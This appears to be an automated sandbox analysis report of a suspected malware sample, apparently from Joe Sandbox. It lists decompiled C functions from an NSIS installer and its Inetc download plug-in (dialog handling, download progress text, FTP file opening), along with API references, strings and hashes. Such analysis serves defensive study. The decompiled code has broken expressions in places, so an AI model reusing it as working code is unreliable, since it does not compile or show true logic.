					SendDlgItemMessageA(_t174, 0x3ed, 0x402, MulDiv( *0x73815ab8, 0x190,  *0x73815ac0), 0);
					_t146 =  *0x73815ab8; // 0x0
					if(_t146 <= 0x1388) {
						_v140 = 0;
					} else {
						_t108 =  *0x73815ac0; // 0x0
						wsprintfA( &_v140, "%d:%02d:%02d", MulDiv(_t108 - _t146, _t176, _t146) / 0xe10, _t110 / _v8 % _v8, _t110 % _v8);
					}
					return SetWindowTextA(GetDlgItem(_t174, 0x3ec),  &_v140);
				}
				return _t99;
			}

0x7381209e
0x738120a1
0x738120ad
0x738120cf
0x738120d7
0x738120e7
0x738120e9
0x738120ee
0x738120f3
0x7381210c
0x7381212d
0x7381212f
0x7381212f
0x73812139
0x7381213c
0x73812146
0x73812146
0x7381214c
0x73812153
0x7381215a
0x7381215a
0x7381216c
0x73812179
0x7381217b
0x73812182
0x738121f0
0x00000000
0x73812184
0x7381218c
0x73812191
0x73812199
0x738121b6
0x738121bf
0x738121ce
0x738121d9
0x738121ec
0x738121f7
0x738121f7
0x738121f7
0x73812199
0x73812207
0x73812209
0x7381220e
0x73812238
0x7381224e
0x73812250
0x73812257
0x7381226e
0x73812282
0x738122a9
0x738122af
0x738122bb
0x738122fe
0x738122bd
0x738122bd
0x738122f3
0x738122f9
0x00000000
0x73812319
0x73812323

APIs

GetTickCount.KERNEL32 ref: 7381208D
GetTickCount.KERNEL32 ref: 738120A1
wsprintfA.USER32 ref: 738120E7
MulDiv.KERNEL32(00000064,00000000), ref: 7381210C
lstrlenA.KERNEL32(?, %d%%,00000000), ref: 7381211F
wsprintfA.USER32 ref: 7381212D
SetWindowTextA.USER32(?,?), ref: 73812146
SetDlgItemTextA.USER32 ref: 7381216C
SetDlgItemTextA.USER32 ref: 73812179
lstrcatA.KERNEL32(?, ( ), ref: 738121B6
lstrlenA.KERNEL32(?), ref: 738121BF
lstrcatA.KERNEL32(?,/sec ),00000000), ref: 738121EC
SetDlgItemTextA.USER32 ref: 73812207
wsprintfA.USER32 ref: 73812238
SetDlgItemTextA.USER32 ref: 7381224E
SetDlgItemTextA.USER32 ref: 73812282
MulDiv.KERNEL32(00000190,00000000), ref: 73812297
SendDlgItemMessageA.USER32(?,000003ED,00000402,00000000), ref: 738122A9
MulDiv.KERNEL32(00000000,?,00000000), ref: 738122C7
wsprintfA.USER32 ref: 738122F3
GetDlgItem.USER32 ref: 73812312
SetWindowTextA.USER32(00000000), ref: 73812319

Strings

%s - %s, xrefs: 738120E1
<, xrefs: 7381220E
%d:%02d:%02d, xrefs: 73812232, 738122ED
%d%%, xrefs: 73812113
( , xrefs: 738121AA
/sec ), xrefs: 738121E0
Inetc plug-in, xrefs: 738120D2

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: ItemText$wsprintf$CountTickWindowlstrcatlstrlen$MessageSend
String ID: ( $ %d%%$%d:%02d:%02d$%s - %s$/sec )$<$Inetc plug-in
API String ID: 2899058848-745815842
Opcode ID: 5fe0438820b3df7f6aab6635fe392a677b76510442261a87e78b6a39dda27daf
Instruction ID: 9b7d0f2382204f03139a1899b3f02422e3500c8df13043d3494a760f384bb853
Opcode Fuzzy Hash: 5fe0438820b3df7f6aab6635fe392a677b76510442261a87e78b6a39dda27daf
Instruction Fuzzy Hash: 2B6196B3900519EFDB41EBAACC85F9E737EEB44214F64825DF50DD7180EB70AA988B50

Uniqueness

Uniqueness Score: -1.00%

Function 004038CF, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004038CF(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x7b0494 = _t35;
					if(_t115 == 0x110) {
						 *0x7c56a8 = _t125;
						 *0x7b04a8 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x7a8470 = _t91;
						E00403DA2(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7c1688);
						 *0x7c166c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x7b0494 = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x7c56c0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DEE(0x40b);
						while(1) {
							_t37 =  *0x7b0494;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x7c56c4;
							if(_t39 ==  *0x7c56c4) {
								E0040140B(1);
							}
							__eflags =  *0x7c166c - _t133;
							if( *0x7c166c != _t133) {
								break;
							}
							__eflags =  *0x4091a4 -  *0x7c56c4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405A12(_t116, _t125, _t130, 0x802000,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403DA2(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x7c572c - _t133;
							_v32 = _t49;
							if( *0x7c572c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DC4(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x7a8470, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x7c572c - _t133;
							if( *0x7c572c == _t133) {
								_push( *0x7b04a8);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x7a8470);
							}
							E00403DD7();
							E004059F0(0x7b04b0, 0x7c16a0);
							E00405A12(0x7b04b0, _t125, _t130,  &(0x7b04b0[lstrlenA(0x7b04b0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x7b04b0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x7c1678);
									 *0x7ac480 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x7c56a0,  *_t130 +  *0x7c1680 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x7c1678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403DA2(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x7c1678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x7c166c - _t133;
									if( *0x7c166c != _t133) {
										goto L61;
									}
									ShowWindow( *0x7c1678, 8);
									E00403DEE(0x405);
									goto L58;
								}
								__eflags =  *0x7c572c - _t133;
								if( *0x7c572c != _t133) {
									goto L61;
								}
								__eflags =  *0x7c5720 - _t133;
								if( *0x7c5720 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7c1678);
						 *0x7c56a8 = _t133;
						EndDialog(_t125,  *0x7aa478);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x7c1678, 0x40f, 0, 1);
						__eflags =  *0x7c166c;
						return 0 |  *0x7c166c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x7b0488, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7b0488,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return L00403E09(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7c1678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7c572c - _t133;
										if( *0x7c572c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x7aa478 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D7B();
											goto L26;
										}
										E0040140B(_t127);
										 *0x7aa478 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7c1678);
						 *0x7c1678 = _a12;
						L58:
						if( *0x7b84b0 == _t133 &&  *0x7c1678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x7b84b0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040390B
ShowWindow.USER32(?), ref: 00403928
DestroyWindow.USER32 ref: 0040393C
SetWindowLongA.USER32 ref: 00403958
GetDlgItem.USER32 ref: 00403979
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040398D
IsWindowEnabled.USER32(00000000), ref: 00403994
GetDlgItem.USER32 ref: 00403A42
GetDlgItem.USER32 ref: 00403A4C
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A66
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AB7
GetDlgItem.USER32 ref: 00403B5D
ShowWindow.USER32(00000000,?), ref: 00403B7E
EnableWindow.USER32(?,?), ref: 00403B90
EnableWindow.USER32(?,?), ref: 00403BAB
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BC1
EnableMenuItem.USER32 ref: 00403BC8
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BE0
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BF3
lstrlenA.KERNEL32(007B04B0,?,007B04B0,007C16A0), ref: 00403C1C
SetWindowTextA.USER32(?,007B04B0), ref: 00403C2B
ShowWindow.USER32(?,0000000A), ref: 00403D5F

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction ID: 844fe8c9d5e64a327b0a20496c5cf27aed03d28131746735177e2461b2ae32ce
Opcode Fuzzy Hash: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction Fuzzy Hash: 93C19C71A04204AFDB206F21ED85E2B3F6CEB45706F44453EF641B52E1CB7DA9819B2E

Uniqueness

Uniqueness Score: -1.00%

Function 73812BCC, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 204
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E73812BCC() {
				CHAR* _v8;
				signed int _v12;
				signed int _v16;
				signed int _t42;
				CHAR* _t54;
				int _t56;
				int _t58;
				int _t63;
				int _t71;
				signed int _t72;
				signed int _t73;
				int _t75;
				int _t76;
				signed int _t77;
				unsigned int _t78;
				int _t84;
				int _t85;
				signed int _t96;
				int _t101;
				int _t106;
				signed int _t107;
				struct HWND__* _t108;
				void* _t111;
				void* _t112;

				if((GetTickCount() -  *0x73815ad0) / 0x3e8 >= 1) {
					_t76 = (GetTickCount() -  *0x73815ad0) / 0x3e8;
				} else {
					_t76 = 1;
				}
				_t101 =  *0x73815ab8; // 0x0
				_t42 = _t101;
				_t96 = _t42 % _t76;
				_t84 =  *0x73815ac0; // 0x0
				_v12 = _t42 / _t76;
				if(_t101 == 0 || _t84 == 0xffffffff) {
					_t106 = 0;
				} else {
					_t75 = MulDiv(_t76, _t84, _t101);
					_t101 =  *0x73815ab8; // 0x0
					_t84 =  *0x73815ac0; // 0x0
					_t106 = _t75 - _t76;
				}
				_t107 =  <  ? 0 : _t106;
				_t77 = 0x3c;
				_v8 = "second";
				if(_t107 >= _t77) {
					_t72 = _t107;
					asm("cdq");
					_t73 = _t72 / _t77;
					_t96 = _t72 % _t77;
					_v8 = "minute";
					_t107 = _t73;
					if(_t107 >= _t77) {
						asm("cdq");
						_t96 = _t73 % _t77;
						_v8 = "hour";
						_t107 = _t73 / _t77;
					}
				}
				if(_t84 == 0xffffffff) {
					_t78 = 0;
				} else {
					_t78 = _t84 >> 0xa;
				}
				if(_t84 == 0 || _t84 == 0xffffffff) {
					_t85 = 0;
				} else {
					_t71 = MulDiv(0x64, _t101, _t84);
					_t101 =  *0x73815ab8; // 0x0
					_t85 = _t71;
				}
				asm("cdq");
				asm("cdq");
				_v16 = 0xa;
				asm("cdq");
				wsprintfA(0x73818430, "%dkB (%d%%) of %dkB @ %d.%01dkB/s", _t101 >> 0xa, _t85, _t78, _v12 + ((_v12 * 0x0000000a + (_t96 & 0x000003ff) >> 0x0000000a) % _v16 & 0x000003ff) >> 0xa, (_v12 * 0xa + (_t96 & 0x000003ff) >> 0xa) % _v16);
				_t112 = _t111 + 0x1c;
				if(_t107 != 0) {
					_t67 =  !=  ? "s" : 0x73814150;
					wsprintfA( &(0x73818430[lstrlenA(0x73818430)]), " (%d %s%s remaining)", _t107, _v8,  !=  ? "s" : 0x73814150);
					_t112 = _t112 + 0x14;
				}
				if( *0x73815ab8 == 0) {
					L21:
					_t54 = "Connecting ...";
					goto L22;
				} else {
					_t54 = 0x73818430;
					if( *0x73815ab4 != 1) {
						L22:
						SetDlgItemTextA( *0x73815ae4, 0x3e9, _t54);
						_t56 =  *0x73815ac0; // 0x0
						if(_t56 != 0 && _t56 != 0xffffffff) {
							_t63 = MulDiv( *0x73815ab8, 0x190, _t56);
							SendMessageA(GetDlgItem( *0x73815ae4, 0x3ed), 0x402, _t63, 0);
						}
						if( *0x73815828 != 0) {
							_push(0x73815828);
							_push("%s");
						} else {
							_t109 = 0x738156c8;
							if(E73811049(0x738156c8, 0x5c) != 0) {
								_t35 = E73811049(0x738156c8, 0x5c) + 1; // 0x1
								_t109 = _t35;
							}
							_push("Downloading %s");
						}
						wsprintfA(0x73818430, ??);
						_t58 = GetDlgItem( *0x73815ae0, 0x3ee);
						_t108 = _t58;
						if( *0x73815ad8 != 0 || _t108 == 0) {
							L35:
							return _t58;
						} else {
							_t58 = IsWindow(_t108);
							if(_t58 == 0) {
								goto L35;
							}
							GetWindowTextA(_t108, 0x73818830, 0x400);
							_t58 = lstrcmpA(0x73818830, 0x73818430);
							if(_t58 == 0) {
								goto L35;
							}
							return SetWindowTextA(_t108, 0x73818430);
						}
					}
					goto L21;
				}
			}

0x73812bef
0x73812c02
0x73812bf1
0x73812bf3
0x73812bf3
0x73812c04
0x73812c0c
0x73812c0e
0x73812c10
0x73812c16
0x73812c1b
0x73812c3d
0x73812c22
0x73812c25
0x73812c2b
0x73812c31
0x73812c39
0x73812c39
0x73812c45
0x73812c48
0x73812c49
0x73812c52
0x73812c54
0x73812c56
0x73812c57
0x73812c57
0x73812c59
0x73812c60
0x73812c64
0x73812c66
0x73812c67
0x73812c69
0x73812c70
0x73812c70
0x73812c64
0x73812c75
0x73812c7e
0x73812c77
0x73812c79
0x73812c79
0x73812c82
0x73812c9d
0x73812c89
0x73812c8d
0x73812c93
0x73812c99
0x73812c99
0x73812ca5
0x73812cb1
0x73812cb2
0x73812cc3
0x73812ce4
0x73812ce6
0x73812ceb
0x73812cfa
0x73812d11
0x73812d13
0x73812d13
0x73812d1d
0x73812d2a
0x73812d2a
0x00000000
0x73812d1f
0x73812d26
0x73812d28
0x73812d2f
0x73812d3b
0x73812d41
0x73812d4e
0x73812d63
0x73812d7d
0x73812d7d
0x73812d8a
0x73812db4
0x73812db9
0x73812d8c
0x73812d8e
0x73812d9d
0x73812da9
0x73812da9
0x73812da9
0x73812dad
0x73812dad
0x73812dc3
0x73812dd3
0x73812ddc
0x73812dde
0x73812e1e
0x73812e1e
0x73812de4
0x73812de5
0x73812ded
0x00000000
0x00000000
0x73812dfb
0x73812e08
0x73812e10
0x00000000
0x00000000
0x00000000
0x73812e14
0x73812dde
0x00000000
0x73812d28

APIs

GetTickCount.KERNEL32 ref: 73812BDB
GetTickCount.KERNEL32 ref: 73812BF6
MulDiv.KERNEL32(-73815AD0,00000000,00000000), ref: 73812C25
MulDiv.KERNEL32(00000064,00000000,00000000), ref: 73812C8D
wsprintfA.USER32 ref: 73812CE4
lstrlenA.KERNEL32(73818430, (%d %s%s remaining),00000000,?,73814150), ref: 73812D08
wsprintfA.USER32 ref: 73812D11
SetDlgItemTextA.USER32 ref: 73812D3B
MulDiv.KERNEL32(00000190,00000000,00000000), ref: 73812D63
GetDlgItem.USER32 ref: 73812D7A
SendMessageA.USER32(00000000), ref: 73812D7D
wsprintfA.USER32 ref: 73812DC3
GetDlgItem.USER32 ref: 73812DD3
IsWindow.USER32(00000000), ref: 73812DE5
GetWindowTextA.USER32 ref: 73812DFB
lstrcmpA.KERNEL32(73818830,73818430), ref: 73812E08
SetWindowTextA.USER32(00000000,73818430), ref: 73812E14

Strings

(%d %s%s remaining), xrefs: 73812D02
hour, xrefs: 73812C69
Downloading %s, xrefs: 73812DAD
Connecting ..., xrefs: 73812D2A, 73812D2F
second, xrefs: 73812C49
minute, xrefs: 73812C59
%dkB (%d%%) of %dkB @ %d.%01dkB/s, xrefs: 73812CD9

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: ItemTextWindowwsprintf$CountTick$MessageSendlstrcmplstrlen
String ID: (%d %s%s remaining)$%dkB (%d%%) of %dkB @ %d.%01dkB/s$Connecting ...$Downloading %s$hour$minute$second
API String ID: 3991246718-1428494263
Opcode ID: f5ef5e30f9dbc237ebe622b87f7ca83755473148dfb782974527cce305c7343e
Instruction ID: f7209d51b261268b16ee1a44888a30aefc5338e75b6cf84bbb99c89934f59599
Opcode Fuzzy Hash: f5ef5e30f9dbc237ebe622b87f7ca83755473148dfb782974527cce305c7343e
Instruction Fuzzy Hash: A551DBB360061BEFD7116BAE8C95F5A377BEB44225B39032CF90EE72C0D63099648694

Uniqueness

Uniqueness Score: -1.00%

Function 73812324, Relevance: 40.6, APIs: 15, Strings: 8, Instructions: 312
networkfilestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E73812324(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				void* _v16;
				char _v271;
				char _v272;
				intOrPtr _t66;
				intOrPtr* _t69;
				void* _t73;
				void* _t82;
				void* _t96;
				CHAR* _t97;
				signed int _t98;
				long _t104;
				void* _t117;
				intOrPtr* _t130;
				signed int _t131;
				void* _t134;
				void* _t144;
				void* _t152;
				long _t176;
				CHAR* _t178;
				void* _t179;
				void* _t180;
				void* _t181;

				_v272 = 0;
				E73811000( &_v271, 0, 0xff);
				_t180 = _t179 + 0xc;
				_v8 = 0x100;
				InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8);
				_t66 =  *0x73815ab8; // 0x0
				_t144 = _a4;
				if(_t66 != 0) {
					wsprintfA( &_v272, "REST %d", _t66);
					_t69 =  *0x738156c0; // 0x70657670
					_t181 = _t180 + 0xc;
					if(_t69 == 0) {
						L39:
						 *0x73815ab4 = 0xe;
						return 0;
					}
					_push( &_v16);
					_push(0);
					_push( &_v272);
					_push(2);
					_push(0);
					_push(_t144);
					if( *_t69() == 0) {
						goto L39;
					}
					_t73 = E73811000( &_v272, 0, 0x100);
					_t180 = _t181 + 0xc;
					if(_t73 == 0) {
						goto L39;
					}
					_v8 = 0x100;
					if(InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8) == 0 || E73811065( &_v272, "350") == 0 && E73811065( &_v272, "110") == 0) {
						goto L39;
					} else {
						L17:
						_t81 =  !=  ? 0x40000000 : 0x80000000;
						_t82 = FtpOpenFileA(_t144, _a8 + 1,  !=  ? 0x40000000 : 0x80000000, 0x80000002, 0);
						_v16 = _t82;
						if(_t82 != 0) {
							_v8 = 0x100;
							InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8);
							L38:
							return _v16;
						}
						_t176 = GetLastError();
						_v272 = 0;
						_v8 = 0x100;
						InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8);
						if( *0x73815adf == 0 || E73811065( &_v272, "550") == 0 && E73811065( &_v272, "553") == 0) {
							if(_t176 != 0x2ee3) {
								if(_t176 == 0x2ee2) {
									_t152 = 1;
									_t94 =  ==  ? _t152 :  *0x73815ada & 0x000000ff;
									 *0x73815ada =  ==  ? _t152 :  *0x73815ada & 0x000000ff;
									 *0x73815ab4 = 9;
								}
								goto L38;
							}
							_t96 = E73811065( &_v272, "550");
							_t97 =  &_v272;
							if(_t96 == 0) {
								goto L34;
							}
							 *0x73815ab4 = 0x13;
							goto L33;
						} else {
							_t178 = _a8 + 1;
							if( *_t178 == 0x2f) {
								_t178 =  &(_t178[1]);
							}
							_t104 = E7381102E(_t178, 0x2f);
							while(_t104 != 0) {
								 *((char*)(E7381102E(_t178, 0x2f))) = 0;
								FtpCreateDirectoryA(_t144, _a8 + 1);
								_v8 = 0x100;
								InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8);
								_t178[lstrlenA(_t178)] = 0x2f;
								_t45 = E7381102E(_t178, 0x2f) + 1; // 0x1
								_t178 = _t45;
								_t104 = E7381102E(_t178, 0x2f);
								_t180 = _t180 + 0x10;
							}
							if( *0x73815ab4 == 0x1b) {
								goto L38;
							}
							_t117 = FtpOpenFileA(_t144, _a8 + 1, 0x40000000, 0x80000002, _t104);
							_v16 = _t117;
							if(_t117 != 0) {
								goto L38;
							}
							 *0x73815ab4 = 0x1c;
							_v8 = 0x100;
							if(InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8) == 0) {
								goto L38;
							}
							_t97 =  &_v272;
							L33:
							_t97 = E73811065(_t97, "550");
							L34:
							_t98 =  *0x73815ab4; // 0x4
							lstrcpynA((_t98 << 5) + 0x73815000, _t97, 0x20);
							goto L38;
						}
					}
				}
				if( *0x73815adf != 0) {
					goto L17;
				}
				wsprintfA( &_v272, "SIZE %s", _a8 + 1);
				_t130 =  *0x738156c0; // 0x70657670
				_t180 = _t180 + 0xc;
				if(_t130 == 0) {
					L8:
					_t131 =  *0x73815ac0; // 0x0
					L9:
					if(_t131 == 0) {
						 *0x73815ac0 =  *0x73815ac0 | 0xffffffff;
					}
					goto L17;
				}
				_push( &_v16);
				_push(0);
				_push( &_v272);
				_push(1);
				_push(0);
				_push(_t144);
				if( *_t130() == 0x270f) {
					goto L8;
				}
				_t134 = E73811000( &_v272, 0, 0x100);
				_t180 = _t180 + 0xc;
				if(_t134 == 0) {
					goto L8;
				}
				_v8 = 0x100;
				if(InternetGetLastResponseInfoA( &_v12,  &_v272,  &_v8) == 0 || E73811065( &_v272, "213 ") == 0) {
					goto L8;
				} else {
					_t131 = E73813B34(E7381102E( &_v272, 0x20) + 1);
					 *0x73815ac0 = _t131;
					goto L9;
				}
			}

0x7381233e
0x73812345
0x73812350
0x73812367
0x7381236a
0x7381236c
0x73812371
0x73812376
0x73812450
0x73812456
0x7381245b
0x73812460
0x738126eb
0x738126eb
0x00000000
0x738126f5
0x73812469
0x7381246a
0x73812472
0x73812473
0x73812475
0x73812477
0x7381247c
0x00000000
0x00000000
0x7381248c
0x73812491
0x73812496
0x00000000
0x00000000
0x738124ab
0x738124b2
0x00000000
0x738124ea
0x738124ea
0x73812506
0x7381250c
0x73812512
0x73812517
0x738126e1
0x738126e4
0x738126e6
0x00000000
0x738126e6
0x73812523
0x73812534
0x7381253b
0x73812542
0x7381254b
0x73812656
0x738126ab
0x738126bd
0x738126be
0x738126c1
0x738126c6
0x738126c6
0x00000000
0x738126ab
0x73812664
0x7381266d
0x73812673
0x00000000
0x00000000
0x73812675
0x00000000
0x73812583
0x73812586
0x7381258a
0x7381258c
0x7381258c
0x73812590
0x738125eb
0x738125a2
0x738125ac
0x738125c1
0x738125c8
0x738125d4
0x738125dd
0x738125dd
0x738125e3
0x738125e8
0x738125e8
0x738125f6
0x00000000
0x00000000
0x7381260d
0x73812613
0x73812618
0x00000000
0x00000000
0x7381262d
0x73812637
0x73812642
0x00000000
0x00000000
0x73812648
0x7381267f
0x73812685
0x7381268c
0x7381268f
0x7381269d
0x00000000
0x7381269d
0x7381254b
0x738124b2
0x73812383
0x00000000
0x00000000
0x7381239a
0x738123a0
0x738123a5
0x738123aa
0x7381242a
0x7381242a
0x7381242f
0x73812431
0x73812437
0x73812437
0x00000000
0x73812431
0x738123af
0x738123b0
0x738123b8
0x738123b9
0x738123bb
0x738123bd
0x738123c5
0x00000000
0x00000000
0x738123d1
0x738123d6
0x738123db
0x00000000
0x00000000
0x738123ec
0x738123f3
0x00000000
0x7381240c
0x7381241e
0x73812423
0x00000000
0x73812423

APIs

InternetGetLastResponseInfoA.WININET(?,00000000,?), ref: 7381236A
wsprintfA.USER32 ref: 7381239A
InternetGetLastResponseInfoA.WININET(?,?,?), ref: 738123EF
wsprintfA.USER32 ref: 73812450
InternetGetLastResponseInfoA.WININET(?,?,?), ref: 738124AE
FtpOpenFileA.WININET(?,?,80000000,80000002,00000000), ref: 7381250C
GetLastError.KERNEL32 ref: 7381251D
InternetGetLastResponseInfoA.WININET(?,?,?), ref: 73812542
